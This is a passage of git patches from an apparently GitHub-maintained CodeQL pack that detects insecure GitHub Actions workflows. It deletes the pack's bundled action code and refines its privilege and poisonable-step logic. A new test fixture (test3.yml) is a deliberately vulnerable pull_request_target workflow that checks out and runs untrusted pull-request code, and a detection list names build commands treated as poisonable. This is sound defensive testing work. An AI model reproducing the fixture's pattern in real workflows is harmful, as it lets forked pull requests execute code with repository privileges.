"sha512-JlCMO+ehdEIKqlFxk6IfVoAUVmgz7cU7zD/h9XZ0qzeosSHmUJVOzSQvvYSYWXkFXC+IfLKSIffhv0sVZup6pA==", - "dev": true - }, - "universal-user-agent": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/universal-user-agent/-/universal-user-agent-6.0.1.tgz", - "integrity": "sha512-yCzhz6FN2wU1NiiQRogkTQszlQSlpWaw8SvVegAc+bDxbzHgh1vX8uIe8OYyMH6DwH+sdTJsgMl36+mSMdRJIQ==" - }, - "uuid": { - "version": "8.3.2", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", - "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==" - }, - "webidl-conversions": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", - "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" - }, - "whatwg-url": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", - "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", - "requires": { - "tr46": "~0.0.3", - "webidl-conversions": "^3.0.0" - } - }, - "wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" - } - } -} diff --git a/.github/action/package.json b/.github/action/package.json deleted file mode 100644 index cd9021d20c5e..000000000000 --- a/.github/action/package.json +++ /dev/null @@ -1,48 +0,0 @@ -{ - "name": "codeql-actions-action", - "version": "0.1.0", - "description": "CodeQL Pack to analyze GitHub Actions and Workflows", - "main": "dist/index.js", - "scripts": { - "bundle": "npm run format:write && npm run package", - "cli": "ts-node src/index.ts", - "ci-test": "jest", - "format:write": "prettier --write **/*.ts", - "format:check": "prettier --check **/*.ts", - "lint": "npx eslint . -c ./.github/linters/.eslintrc.yml", - "package": "ncc build src/index.ts --license licenses.txt", - "package:watch": "npm run package -- --watch", - "test": "(jest && make-coverage-badge --output-path ./badges/coverage.svg) || make-coverage-badge --output-path ./badges/coverage.svg", - "all": "npm run format:write && npm run lint && npm run test && npm run package" - }, - "repository": { - "type": "git", - "url": "git+https://github.com/GitHubSecurityLab/codeql-actions.git" - }, - "exports": { - ".": "./dist/index.js" - }, - "keywords": [ - "codeql", - "security", - "actions" - ], - "author": "Pwntester", - "license": "MIT", - "bugs": { - "url": "https://github.com/GitHubSecurityLab/codeql-actions/issues" - }, - "homepage": "https://github.com/GitHubSecurityLab/codeql-actions#readme", - "dependencies": { - "@actions/core": "^1.10.1", - "@actions/exec": "^1.1.1", - "@actions/github": "^5.1.1", - "@actions/tool-cache": "^2.0.1" - }, - "devDependencies": { - "@types/node": "^20.12.7", - "@vercel/ncc": "^0.38.0", - "prettier": "^3.0.3", - "typescript": "^5.2.2" - } -} diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts deleted file mode 100644 index 5b06b007d8ae..000000000000 --- a/.github/action/src/codeql.ts +++ /dev/null @@ -1,172 +0,0 @@ -import * as fs from "fs"; -import * as path from "path"; - -import * as core from "@actions/core"; -import * as toolcache from "@actions/tool-cache"; -import * as toolrunner from "@actions/exec/lib/toolrunner"; - -export interface CodeQLConfig { - // The path to the codeql bundle. - path: string; - // The language to use for analysis. - language: string; - // CodeQL pack to use for analysis. - pack: string; - // The codeql suite to use for analysis. - suite: string; - // The source root to use for analysis. - source_root?: string; - // The output file for the SARIF file. - output?: string; - // Extension CodeQL packs to use for analysis. - packs: string | undefined; -} - -export async function newCodeQL(): Promise { - return { - language: "javascript", - path: await findCodeQL(), - pack: "github/actions-queries", - suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, - source_root: core.getInput("source-root"), - output: core.getInput("sarif"), - packs: - core.getInput("packs").length > 0 ? core.getInput("packs") : undefined, - }; -} - -export async function runCommand( - config: CodeQLConfig, - args: string[], - cwd_arg?: string, -): Promise { - var bin = path.join(config.path, "codeql"); - let output = ""; - var cwd: string = process.cwd(); - if (cwd_arg) { - cwd = cwd_arg; - } - core.info("Current working directory: " + cwd); - var options = { - cwd: cwd, - listeners: { - stdout: (data: Buffer) => { - output += data.toString(); - }, - }, - }; - - await new toolrunner.ToolRunner(bin, args, options).exec(); - core.debug(`Finished running command :: ${bin} ${args.join(" ")}`); - - return output.trim(); -} - -export async function runCommandJson( - config: CodeQLConfig, - args: string[], -): Promise { - return JSON.parse(await runCommand(config, args)); -} -async function findCodeQL(): Promise { - // check if codeql is in the toolcache - var codeqlPath = await findCodeQlInToolcache(); - if (codeqlPath !== undefined) { - return codeqlPath; - } - // default to the codeql in the path - return "codeql"; -} - -async function findCodeQlInToolcache(): Promise { - const candidates = toolcache - .findAllVersions("CodeQL") - .map((version) => ({ - folder: toolcache.find("CodeQL", version), - version, - })) - .filter(({ folder }) => fs.existsSync(path.join(folder, "pinned-version"))); - - if (candidates.length === 1) { - const candidate = candidates[0]; - core.info(`CodeQL tools found in toolcache: '${candidate.folder}'.`); - core.debug(`CodeQL toolcache version: '${candidate.version}'.`); - - return path.join(candidate.folder, "codeql"); - } - - core.warning(`No CodeQL tools found in toolcache.`); - - return undefined; -} - -export async function downloadPack(codeql: CodeQLConfig): Promise { - try { - await runCommand(codeql, ["pack", "download", codeql.pack]); - return true; - } catch (error) { - core.warning("Failed to download pack from GitHub..."); - } - return false; -} - -export async function codeqlDatabaseCreate( - codeql: CodeQLConfig, -): Promise { - // get runner temp directory for database - var temp = process.env["RUNNER_TEMP"]; - if (temp === undefined) { - temp = "/tmp"; - } - var database_path = path.join(temp, "codeql-actions-db"); - var source_root = - codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; - - await runCommand(codeql, [ - "database", - "create", - "--language", - codeql.language, - "--source-root", - source_root, - database_path, - ]); - - return database_path; -} - -export async function codeqlDatabaseAnalyze( - codeql: CodeQLConfig, - database_path: string, -): Promise { - var codeql_output = codeql.output || "codeql-actions.sarif"; - - var cmd = [ - "database", - "analyze", - "--format", - "sarif-latest", - "--sarif-add-query-help", - "--output", - codeql_output, - ]; - - if (codeql.packs !== undefined) { - cmd.push("--extension-packs", codeql.packs); - } - - // remote pack or local pack - if (codeql.pack.startsWith("githubsecuritylab/")) { - var suite = codeql.pack + ":" + codeql.suite; - } else { - // assume path - var suite = path.join(codeql.pack, codeql.suite); - cmd.push("--search-path", codeql.pack); - } - - cmd.push(database_path, suite); - - await runCommand(codeql, cmd); - - return codeql_output; -} diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts deleted file mode 100644 index 53a484ae6c18..000000000000 --- a/.github/action/src/index.ts +++ /dev/null @@ -1,61 +0,0 @@ -import * as path from "path"; -import * as core from "@actions/core"; -import * as cql from "./codeql"; - -/** - * The main function for the action. - * @returns {Promise} Resolves when the action is complete. - */ -export async function run(): Promise { - try { - // set up codeql - var codeql = await cql.newCodeQL(); - - core.debug(`CodeQL CLI found at '${codeql.path}'`); - - await cql.runCommand(codeql, ["version", "--format", "terse"]); - - // check javascript support - var languages = await cql.runCommandJson(codeql, [ - "resolve", - "languages", - "--format", - "json", - ]); - - if (!languages.hasOwnProperty("javascript")) { - core.setFailed("CodeQL javascript extractor not installed"); - throw new Error("CodeQL javascript extractor not installed"); - } - - // download pack - core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - var pack_downloaded = await cql.downloadPack(codeql); - - if (pack_downloaded === false) { - var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); - codeql.pack = path.join(action_path, "ql", "src"); - - core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); - } else { - core.info(`Pack downloaded '${codeql.pack}'`); - } - - core.info("Creating CodeQL database..."); - var database_path = await cql.codeqlDatabaseCreate(codeql); - - core.info("Running CodeQL analysis..."); - var sarif = await cql.codeqlDatabaseAnalyze(codeql, database_path); - - core.info(`SARIF results: '${sarif}'`); - core.setOutput("sarif", sarif); - - core.info("Finished CodeQL analysis"); - } catch (error) { - // Fail the workflow run if an error occurs - if (error instanceof Error) core.setFailed(error.message); - } -} - -// eslint-disable-next-line @typescript-eslint/no-floating-promises -run(); diff --git a/.github/action/tsconfig.json b/.github/action/tsconfig.json deleted file mode 100644 index c4b7762f9cd2..000000000000 --- a/.github/action/tsconfig.json +++ /dev/null @@ -1,24 +0,0 @@ -{ - "$schema": "https://json.schemastore.org/tsconfig", - "compilerOptions": { - "target": "ES2022", - "module": "NodeNext", - "rootDir": "./src", - "moduleResolution": "NodeNext", - "baseUrl": "./", - "sourceMap": true, - "outDir": "./dist", - "noImplicitAny": true, - "esModuleInterop": true, - "forceConsistentCasingInFileNames": true, - "strict": true, - "skipLibCheck": true, - "newLine": "lf" - }, - "exclude": [ - "./dist", - "./node_modules", - "./__tests__", - "./coverage" - ] -} diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml deleted file mode 100644 index 9bc5b787feac..000000000000 --- a/.github/workflows/build.yml +++ /dev/null @@ -1,30 +0,0 @@ -name: Build and Compile Action - -on: - pull_request: - branches: ["master", "develop"] - workflow_dispatch: - -permissions: - contents: read - packages: read - pull-requests: read - -jobs: - action: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v4 - - uses: dorny/paths-filter@v3 - id: changes - with: - filters: | - src: - - '.github/action/**' - - 'action.yml' - - - name: Run action - if: steps.changes.outputs.src == 'true' - uses: ./ - with: - token: ${{ secrets.GHCR_TOKEN }} diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml deleted file mode 100644 index a6b568f2bfb2..000000000000 --- a/.github/workflows/copy-to-bughalla.yml +++ /dev/null @@ -1,34 +0,0 @@ -name: Copy to Bughalla - -on: - push: - branches: - - 'master' - -permissions: - contents: read - -jobs: - copy: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v4 - with: - token: ${{ secrets.BUGHALLA_TOKEN }} - fetch-depth: 0 - - - run: | - rm -rf .github/workflows/copy-to-bughalla.yml - git remote set-url --push origin git@github.com:bughalla/codeql-actions - git config user.name 'github-actions[bot]' - git config user.email 'github-actions[bot]@users.noreply.github.com' - git add -v . - git commit -m 'Actions: Add patch' - - - name: Push changes - uses: ad-m/github-push-action@35284cf030a5836cb567a7bf1b39ebafbfae5f4a - with: - repository: bughalla/codeql-actions - github_token: ${{ secrets.BUGHALLA_TOKEN }} - branch: ${{ github.ref }} - force: true diff --git a/action.yml b/action.yml deleted file mode 100644 index 151c909fb8be..000000000000 --- a/action.yml +++ /dev/null @@ -1,51 +0,0 @@ -name: "codeql-actions" -description: "CodeQL Pack for GitHub Actions and Workflows" - -inputs: - token: - description: GitHub Token - default: ${{ github.token }} - source-root: - description: "Path of the root source code directory, relative to $GITHUB_WORKSPACE." - default: ${{ github.workspace }} - sarif-output: - description: "SARIF File Output" - default: "codeql-actions.sarif" - suite: - description: "CodeQL Suite to run" - default: "actions-code-scanning" - packs: - description: >- - Comma-separated list of packs to run. Reference a pack in the format `scope/name[@version]`. If `version` is not - specified, then the latest version of the pack is used. By default, this overrides the same setting in a - configuration file; prefix with "+" to use both sets of packs. - required: false - -runs: - using: 'composite' - steps: - - name: extpack contents - shell: bash - if: inputs.packs - env: - EXTPACK_PATH: /home/runner/.codeql/packages/local/workflow-models/0.0.1 - EXTPACK_NAME: local/workflow-models - run: | - echo "##[group] Workflow Models" - if [ -f $EXTPACK_PATH/models.yml ]; then cat $EXTPACK_PATH/models.yml; fi - echo "##[endgroup]" - echo "##[group] QLPack" - if [ -f $EXTPACK_PATH/codeql-pack.yml ]; then cat $EXTPACK_PATH/codeql-pack.yml; fi - echo "##[endgroup]" - - - name: Scan workflows - shell: bash - env: - GITHUB_TOKEN: ${{ inputs.token }} - GH_TOKEN: ${{ inputs.token }} - INPUT_SOURCE-ROOT: ${{ inputs.source-root }} - INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} - INPUT_SUITE: ${{ inputs.suite }} - INPUT_PACKS: ${{ inputs.packs }} - run: | - node ${{ github.action_path }}/.github/action/dist/index.js diff --git a/clean.sh b/clean.sh deleted file mode 100755 index e0458a639e36..000000000000 --- a/clean.sh +++ /dev/null @@ -1,2 +0,0 @@ -#! /bin/bash -find . -type d -name "*testproj*" -exec rm -r {} + From 6df70d1a455f67ce3a174ea0dda7ea9384fec8ad Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 23 Jun 2024 21:34:30 +0200 Subject: [PATCH 343/707] Do not consider priv events if runtime data is available --- ql/lib/codeql/actions/ast/internal/Ast.qll | 21 +++++++--- .../CWE-829/.github/workflows/test3.yml | 41 +++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 1 + 3 files changed, 58 insertions(+), 5 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index d4864a80e54f..da54833e9a66 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -853,6 +853,14 @@ class JobImpl extends AstNodeImpl, TJobNode { this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") } + private predicate hasRuntimeData() { + exists(string path, string trigger, string name, string secrets_source, string perms | + workflowDataModel(path, trigger, name, secrets_source, perms, _) and + path.trim() = this.getLocation().getFile().getRelativePath() and + name.trim().matches(this.getId() + "%") + ) + } + private predicate hasRuntimeWritePermissions() { // the effective runtime permissions have write access exists(string path, string trigger, string name, string secrets_source, string perms | @@ -885,15 +893,18 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Holds if the action is privileged and externally triggerable. */ predicate isPrivilegedExternallyTriggerable() { exists(EventImpl e | - // job is triggereable by an external user this.getATriggerEvent() = e and + // job is triggereable by an external user e.isExternallyTriggerable() and - // job is privileged (write access or access to secrets) + // no matter if `pull_request` is granted write permissions or access to secrets + // when the job is triggered by a `pull_request` event from a fork, they will get revoked + not e.getName() = "pull_request" and ( - this.isPrivileged() and - not e.getName() = "pull_request" + // job is privileged (write access or access to secrets) + this.isPrivileged() or - not this.isPrivileged() and + // the trigger event is __normally__ privileged and we have no runtime data to prove otherwise + not this.hasRuntimeData() and e.isPrivileged() ) ) diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml new file mode 100644 index 000000000000..d9aa2973e007 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml @@ -0,0 +1,41 @@ +name: "Test" +permissions: + actions: none + checks: none + contents: read + deployments: none + id-token: none + issues: none + discussions: none + packages: none + pages: none + pull-requests: read + repository-projects: none + security-events: none + statuses: none +on: + pull_request_target: + types: + - opened + - edited + - synchronize + +jobs: + main: + name: Test Pull Request + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: npm install + working-directory: scripts/github-actions/semantic-pull-request/ + - name: Lint PR Title + if: github.event_name == 'pull_request_target' + uses: actions/github-script@v7 + with: + script: | + const verifyPullRequest = require('./scripts/github-actions/semantic-pull-request') + await verifyPullRequest({ context, core, github }) diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 92d5a0b5ce18..0ff47fd2c53a 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -4,5 +4,6 @@ | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From b5dfda27fdc7a39e14ff996f034015e4631159a2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 24 Jun 2024 12:45:24 +0200 Subject: [PATCH 344/707] Add cargo as poisonable step --- ql/lib/codeql/actions/security/PoisonableSteps.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index f80f09a32d8c..b1d5269d44a3 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -23,7 +23,7 @@ private string dangerousCommands() { "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate", "msbuild ", "mvn ", "gradle ", "bundle install", "bundle exec ", "^ant ", "mkdocs build", "pytest", "pip install -r ", "pip install --requirement", "java -jar ", "poetry install", - "poetry run" + "poetry run", "cargo " ] } From 24d69f2ee80f0daab0a9ecbd13867046e61f0b6c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 24 Jun 2024 12:45:35 +0200 Subject: [PATCH 345/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 70edc1b05745..abc56e6a0900 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.2 +version: 0.1.3 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 89df5ee87975..74678b945ca5 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.2 +version: 0.1.3 groups: [actions, queries] suites: codeql-suites extractor: javascript From fc8173239e1ba10b9ed2e4f3b5dee76e3854b0cf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 25 Jun 2024 09:47:43 +0200 Subject: [PATCH 346/707] Move configuration to MaD files --- ql/lib/codeql/actions/ast/internal/Ast.qll | 2 +- ql/lib/codeql/actions/config/Config.qll | 74 +++++++++++++++++++ .../actions/config/ConfigExtensions.qll | 41 ++++++++++ .../codeql/actions/dataflow/ExternalFlow.qll | 45 ----------- .../codeql/actions/dataflow/FlowSources.qll | 3 +- .../internal/ExternalFlowExtensions.qll | 22 ------ .../security/ArtifactPoisoningQuery.qll | 4 +- .../actions/security/CachePoisoningQuery.qll | 2 +- .../actions/security/PoisonableSteps.qll | 62 ++++------------ .../actions/security/SelfHostedQuery.qll | 2 +- .../context_event_map.yml} | 25 +------ .../config/externally_triggereable_events.yml | 18 +++++ ql/lib/ext/config/poisonable_steps.yml | 55 ++++++++++++++ ql/lib/ext/config/workflow_runtime_data.yml | 9 +++ .../8398a7_action-slack.model.yml | 0 ...rSource_sonarcloud-github-action.model.yml | 0 .../actions_github-script.model.yml | 0 ...ahmadnassri_action-changed-files.model.yml | 0 .../akhileshns_heroku-deploy.model.yml | 0 ...nnn_action-semantic-pull-request.model.yml | 0 .../anchore_sbom-action.model.yml | 0 .../anchore_scan-action.model.yml | 0 .../andresz1_size-limit-action.model.yml | 0 .../android-actions_setup-android.model.yml | 0 ...le-actions_import-codesign-certs.model.yml | 0 .../{ => manual}/asdf-vm_actions.model.yml | 0 ...taylor_read-json-property-action.model.yml | 0 ...ley-taylor_regex-property-action.model.yml | 0 .../aszc_change-string-case-action.model.yml | 0 ...ctions_configure-aws-credentials.model.yml | 0 .../axel-op_googlejavaformat-action.model.yml | 0 .../{ => manual}/azure_powershell.model.yml | 0 .../bahmutov_npm-install.model.yml | 0 .../blackducksoftware_github-action.model.yml | 0 .../bobheadxi_deployments.model.yml | 0 .../bufbuild_buf-breaking-action.model.yml | 0 .../bufbuild_buf-lint-action.model.yml | 0 .../bufbuild_buf-setup-action.model.yml | 0 .../cachix_cachix-action.model.yml | 0 .../{ => manual}/changesets_action.model.yml | 0 .../cloudflare_wrangler-action.model.yml | 0 .../coursier_cache-action.model.yml | 0 .../crazy-max_ghaction-chocolatey.model.yml | 0 .../crazy-max_ghaction-import-gpg.model.yml | 0 .../csexton_release-asset-action.model.yml | 0 ...cycjimmy_semantic-release-action.model.yml | 0 .../cypress-io_github-action.model.yml | 0 .../dailydotdev_action-devcard.model.yml | 0 ...me_reportgenerator-github-action.model.yml | 0 .../daspn_private-actions-checkout.model.yml | 0 .../dawidd6_action-ansible-playbook.model.yml | 0 ...dawidd6_action-download-artifact.model.yml | 0 .../delaguardo_setup-clojure.model.yml | 0 ...tesystems_magic-nix-cache-action.model.yml | 0 ...er-practice_actions-setup-docker.model.yml | 0 .../docker_build-push-action.model.yml | 0 .../{ => manual}/endbug_latest-tag.model.yml | 0 .../expo_expo-github-action.model.yml | 0 ...seextended_action-hosting-deploy.model.yml | 0 .../frabert_replace-string-action.model.yml | 0 ...nzdiebold_github-env-vars-action.model.yml | 0 .../gabrielbb_xvfb-action.model.yml | 0 .../game-ci_unity-builder.model.yml | 0 .../game-ci_unity-test-runner.model.yml | 0 ...autamkrishnar_blog-post-workflow.model.yml | 0 .../getsentry_action-release.model.yml | 0 .../github_codeql-action.model.yml | 0 .../go-semantic-release_action.model.yml | 0 .../golangci_golangci-lint-action.model.yml | 0 .../gonuit_heroku-docker-deploy.model.yml | 0 .../goreleaser_goreleaser-action.model.yml | 0 ...te-or-update-pull-request-action.model.yml | 0 .../gradle_gradle-build-action.model.yml | 0 .../haya14busa_action-cond.model.yml | 0 .../hexlet_project-action.model.yml | 0 .../ilammy_msvc-dev-cmd.model.yml | 0 .../{ => manual}/ilammy_setup-nasm.model.yml | 0 .../{ => manual}/imjohnbo_issue-bot.model.yml | 0 .../iterative_setup-cml.model.yml | 0 .../iterative_setup-dvc.model.yml | 0 ...sives_github-pages-deploy-action.model.yml | 0 .../jitterbit_get-changed-files.model.yml | 0 .../johnnymorganz_stylua-action.model.yml | 0 .../jsdaniell_create-json.model.yml | 0 .../jurplel_install-qt-action.model.yml | 0 .../jwalton_gh-ecr-push.model.yml | 0 ...han_pull-request-comment-trigger.model.yml | 0 ...leci-artifacts-redirector-action.model.yml | 0 .../leafo_gh-actions-lua.model.yml | 0 .../leafo_gh-actions-luarocks.model.yml | 0 .../lucasbento_auto-close-issues.model.yml | 0 ..._actions-find-and-replace-string.model.yml | 0 .../magefile_mage-action.model.yml | 0 .../maierj_fastlane-action.model.yml | 0 .../manusa_actions-setup-minikube.model.yml | 0 .../marocchino_on_artifact.model.yml | 0 .../mattdavis0351_actions.model.yml | 0 .../meteorengineer_setup-meteor.model.yml | 0 ...tro-digital_setup-tools-for-waas.model.yml | 0 .../microsoft_setup-msbuild.model.yml | 0 ...mishakav_pytest-coverage-comment.model.yml | 0 ...hers-excellent_docker-build-push.model.yml | 0 .../{ => manual}/msys2_setup-msys2.model.yml | 0 .../mxschmitt_action-tmate.model.yml | 0 .../mymindstorm_setup-emsdk.model.yml | 0 .../nanasess_setup-chromedriver.model.yml | 0 .../{ => manual}/nanasess_setup-php.model.yml | 0 .../{ => manual}/nick-fields_retry.model.yml | 0 .../octokit_graphql-action.model.yml | 0 .../octokit_request-action.model.yml | 0 .../olafurpg_setup-scala.model.yml | 0 .../paambaati_codeclimate-action.model.yml | 0 .../peter-evans_create-pull-request.model.yml | 0 ...-murray_issue-body-parser-action.model.yml | 0 .../plasmicapp_plasmic-action.model.yml | 0 .../preactjs_compressed-size-action.model.yml | 0 .../{ => manual}/py-actions_flake8.model.yml | 0 ...py-actions_py-dependency-install.model.yml | 0 .../pyo3_maturin-action.model.yml | 0 ...vecircus_android-emulator-runner.model.yml | 0 ...bers-in-action_download-artifact.model.yml | 0 .../reggionick_s3-deploy.model.yml | 0 .../renovatebot_github-action.model.yml | 0 .../roots_issue-closer-action.model.yml | 0 .../ros-tooling_setup-ros.model.yml | 0 .../{ => manual}/ruby_setup-ruby.model.yml | 0 ...ction-detect-and-tag-new-version.model.yml | 0 .../sergeysova_jq-action.model.yml | 0 ...shallwefootball_upload-s3-action.model.yml | 0 .../shogo82148_actions-setup-perl.model.yml | 0 ...skitionek_notify-microsoft-teams.model.yml | 0 .../snow-actions_eclint.model.yml | 0 .../stackhawk_hawkscan-action.model.yml | 0 .../step-security_harden-runner.model.yml | 0 .../suisei-cn_actions-download-file.model.yml | 0 .../{ => manual}/tibdex_backport.model.yml | 0 .../timheuer_base64-to-file.model.yml | 0 .../tj-actions_branch-names.model.yml | 0 .../trilom_file-changes-action.model.yml | 0 ...ss_conventional-changelog-action.model.yml | 0 .../tryghost_action-deploy-theme.model.yml | 0 .../tzkhan_pr-update-action.model.yml | 0 .../veracode_veracode-sca.model.yml | 0 .../wearerequired_lint-action.model.yml | 0 .../webfactory_ssh-agent.model.yml | 0 .../xt0rted_slash-command-action.model.yml | 0 .../zaproxy_action-baseline.model.yml | 0 .../zaproxy_action-full-scan.model.yml | 0 ql/lib/qlpack.yml | 6 +- ql/test/library-tests/workflowenum.ql | 2 +- 150 files changed, 224 insertions(+), 148 deletions(-) create mode 100644 ql/lib/codeql/actions/config/Config.qll create mode 100644 ql/lib/codeql/actions/config/ConfigExtensions.qll rename ql/lib/ext/{workflow-models/workflow-models.yml => config/context_event_map.yml} (78%) create mode 100644 ql/lib/ext/config/externally_triggereable_events.yml create mode 100644 ql/lib/ext/config/poisonable_steps.yml create mode 100644 ql/lib/ext/config/workflow_runtime_data.yml rename ql/lib/ext/{ => manual}/8398a7_action-slack.model.yml (100%) rename ql/lib/ext/{ => manual}/SonarSource_sonarcloud-github-action.model.yml (100%) rename ql/lib/ext/{ => manual}/actions_github-script.model.yml (100%) rename ql/lib/ext/{ => manual}/ahmadnassri_action-changed-files.model.yml (100%) rename ql/lib/ext/{ => manual}/akhileshns_heroku-deploy.model.yml (100%) rename ql/lib/ext/{ => manual}/amannn_action-semantic-pull-request.model.yml (100%) rename ql/lib/ext/{ => manual}/anchore_sbom-action.model.yml (100%) rename ql/lib/ext/{ => manual}/anchore_scan-action.model.yml (100%) rename ql/lib/ext/{ => manual}/andresz1_size-limit-action.model.yml (100%) rename ql/lib/ext/{ => manual}/android-actions_setup-android.model.yml (100%) rename ql/lib/ext/{ => manual}/apple-actions_import-codesign-certs.model.yml (100%) rename ql/lib/ext/{ => manual}/asdf-vm_actions.model.yml (100%) rename ql/lib/ext/{ => manual}/ashley-taylor_read-json-property-action.model.yml (100%) rename ql/lib/ext/{ => manual}/ashley-taylor_regex-property-action.model.yml (100%) rename ql/lib/ext/{ => manual}/aszc_change-string-case-action.model.yml (100%) rename ql/lib/ext/{ => manual}/aws-actions_configure-aws-credentials.model.yml (100%) rename ql/lib/ext/{ => manual}/axel-op_googlejavaformat-action.model.yml (100%) rename ql/lib/ext/{ => manual}/azure_powershell.model.yml (100%) rename ql/lib/ext/{ => manual}/bahmutov_npm-install.model.yml (100%) rename ql/lib/ext/{ => manual}/blackducksoftware_github-action.model.yml (100%) rename ql/lib/ext/{ => manual}/bobheadxi_deployments.model.yml (100%) rename ql/lib/ext/{ => manual}/bufbuild_buf-breaking-action.model.yml (100%) rename ql/lib/ext/{ => manual}/bufbuild_buf-lint-action.model.yml (100%) rename ql/lib/ext/{ => manual}/bufbuild_buf-setup-action.model.yml (100%) rename ql/lib/ext/{ => manual}/cachix_cachix-action.model.yml (100%) rename ql/lib/ext/{ => manual}/changesets_action.model.yml (100%) rename ql/lib/ext/{ => manual}/cloudflare_wrangler-action.model.yml (100%) rename ql/lib/ext/{ => manual}/coursier_cache-action.model.yml (100%) rename ql/lib/ext/{ => manual}/crazy-max_ghaction-chocolatey.model.yml (100%) rename ql/lib/ext/{ => manual}/crazy-max_ghaction-import-gpg.model.yml (100%) rename ql/lib/ext/{ => manual}/csexton_release-asset-action.model.yml (100%) rename ql/lib/ext/{ => manual}/cycjimmy_semantic-release-action.model.yml (100%) rename ql/lib/ext/{ => manual}/cypress-io_github-action.model.yml (100%) rename ql/lib/ext/{ => manual}/dailydotdev_action-devcard.model.yml (100%) rename ql/lib/ext/{ => manual}/danielpalme_reportgenerator-github-action.model.yml (100%) rename ql/lib/ext/{ => manual}/daspn_private-actions-checkout.model.yml (100%) rename ql/lib/ext/{ => manual}/dawidd6_action-ansible-playbook.model.yml (100%) rename ql/lib/ext/{ => manual}/dawidd6_action-download-artifact.model.yml (100%) rename ql/lib/ext/{ => manual}/delaguardo_setup-clojure.model.yml (100%) rename ql/lib/ext/{ => 